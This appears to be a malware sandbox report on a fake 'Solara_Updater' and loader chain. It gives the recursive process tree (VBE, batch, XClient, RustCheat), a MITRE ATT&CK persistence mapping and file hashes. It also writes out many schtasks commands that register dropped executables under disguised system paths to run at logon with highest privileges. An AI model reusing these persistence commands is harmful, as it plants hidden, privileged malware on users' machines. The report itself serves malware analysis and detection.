C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"46⤵PID:1460
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"43⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"44⤵PID:1124
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"44⤵PID:1764
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"45⤵PID:1712
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "46⤵
- Loads dropped DLL
PID:1896 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"47⤵PID:2256
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"44⤵PID:2484
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"45⤵PID:684
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"45⤵PID:2164
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"46⤵PID:2552
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "47⤵
- Loads dropped DLL
PID:2360 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"48⤵PID:1172
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"45⤵PID:2188
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"46⤵PID:1708
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"46⤵PID:2332
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"47⤵PID:3036
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "48⤵
- Loads dropped DLL
PID:2444 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"49⤵PID:2100
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"46⤵PID:1672
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"47⤵PID:1484
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"47⤵PID:2052
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"48⤵PID:2176
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "49⤵
- Loads dropped DLL
PID:2932 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"50⤵PID:304
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"47⤵PID:2740
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"48⤵PID:2180
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"48⤵PID:1664
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"49⤵PID:268
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "50⤵
- Loads dropped DLL
PID:1040 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"51⤵PID:1088
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"48⤵PID:316
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"49⤵PID:2076
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"49⤵PID:2352
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"50⤵PID:1800
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "51⤵
- Loads dropped DLL
PID:1764 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"52⤵PID:1544
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"49⤵PID:2272
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"50⤵PID:2700
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"50⤵PID:1048
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"51⤵PID:1212
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "52⤵
- Loads dropped DLL
PID:2400 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"53⤵PID:264
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"50⤵PID:1520
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"51⤵PID:2484
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"51⤵PID:3008
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"52⤵PID:1664
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "53⤵
- Loads dropped DLL
PID:2988 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"54⤵PID:1840
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"51⤵PID:720
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"52⤵PID:1880
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"52⤵PID:928
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"53⤵PID:2664
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "54⤵
- Loads dropped DLL
PID:1620 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"55⤵PID:2260
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"52⤵PID:908
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"53⤵PID:2404
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"54⤵PID:2692
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"54⤵PID:2440
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"53⤵PID:588
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"54⤵PID:1256
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "55⤵
- Loads dropped DLL
PID:2228 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"56⤵PID:1704
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"53⤵PID:3040
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"54⤵PID:1892
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"54⤵PID:2140
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"55⤵PID:1384
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "56⤵
- Loads dropped DLL
PID:2128 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"57⤵PID:2684
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"54⤵PID:2160
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"55⤵PID:1392
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"55⤵PID:2692
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"56⤵PID:2744
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "57⤵
- Loads dropped DLL
PID:3016 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"58⤵PID:2928
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"55⤵PID:2152
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"56⤵PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"56⤵PID:3060
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"57⤵PID:988
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "58⤵
- Loads dropped DLL
PID:2540 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"59⤵PID:2348
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"56⤵PID:2824
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"57⤵PID:2408
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"57⤵PID:1484
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"58⤵PID:2328
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "59⤵
- Loads dropped DLL
PID:2716 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"60⤵PID:2484
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"57⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"58⤵PID:1732
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"59⤵PID:2436
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"59⤵PID:1944
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"58⤵PID:2204
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"59⤵PID:1724
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "60⤵
- Loads dropped DLL
PID:2664 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"61⤵PID:920
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"58⤵PID:2556
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"59⤵PID:1728
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"60⤵PID:3008
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"60⤵PID:828
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"59⤵PID:2592
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"60⤵PID:2796
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "61⤵
- Loads dropped DLL
PID:2276 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"62⤵PID:1624
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"59⤵PID:832
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"60⤵PID:468
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"61⤵PID:1660
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"61⤵PID:2236
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"60⤵PID:1484
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"61⤵PID:1348
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"60⤵PID:2000
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"61⤵PID:2440
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"61⤵PID:2820
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"62⤵PID:924
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"61⤵PID:2484
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"62⤵PID:2912
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"62⤵PID:3068
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"63⤵PID:2860
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"62⤵PID:2244
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"63⤵PID:828
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"63⤵PID:1240
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"64⤵PID:1812
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"63⤵PID:2436
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"64⤵PID:848
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"64⤵PID:2820
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"65⤵PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"64⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"65⤵PID:2052
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"65⤵PID:2224
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"66⤵PID:2312
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"65⤵PID:1464
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"66⤵PID:2992
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"66⤵PID:2068
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"67⤵PID:1232
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"66⤵PID:1880
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"67⤵PID:700
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"67⤵PID:2516
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"68⤵PID:2552
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"67⤵PID:3060
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"68⤵PID:2592
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"68⤵PID:3052
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"69⤵PID:300
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"68⤵PID:2776
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"69⤵PID:2212
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"69⤵PID:2944
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"70⤵PID:2852
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"69⤵PID:1840
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"70⤵PID:2456
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"70⤵PID:1980
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"71⤵PID:1568
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"70⤵PID:2404
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"71⤵PID:1660
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"71⤵PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"71⤵PID:1576
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "471020934-1427772490-572142708-1711754108-114883849119215268499784406681658966023"1⤵PID:1816
-
C:\Windows\system32\taskeng.exetaskeng.exe {3E5015D7-882C-4837-9D08-B1BE7F1C1340} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]1⤵PID:2952
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe2⤵
- Executes dropped EXE
PID:2440
-
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe2⤵PID:2972
-
C:\Users\Admin\AppData\Roaming\svhost.exe.exe"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"3⤵PID:1996
-
-
C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe"C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe"3⤵PID:2704
-
-
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe2⤵PID:2152
-
C:\Users\Admin\AppData\Roaming\svhost.exe.exe"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"3⤵PID:1884
-
-
C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe"C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe"3⤵PID:1764
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2480
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\hostNet\wscript.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\hostNet\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2928
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\hostNet\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1964
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:468
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2352
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:884
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2440
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:448
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 10 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1100
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1812
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 14 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2988
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.8MB
MD58ccc428a5a6f6139dc191d332f3de08b
SHA1ae550a8fb67deeb1350020aa3fe8b0339db6bc71
SHA256801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749
SHA5121479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e
-
Filesize
20KB
MD5c9ff7748d8fcef4cf84a5501e996a641
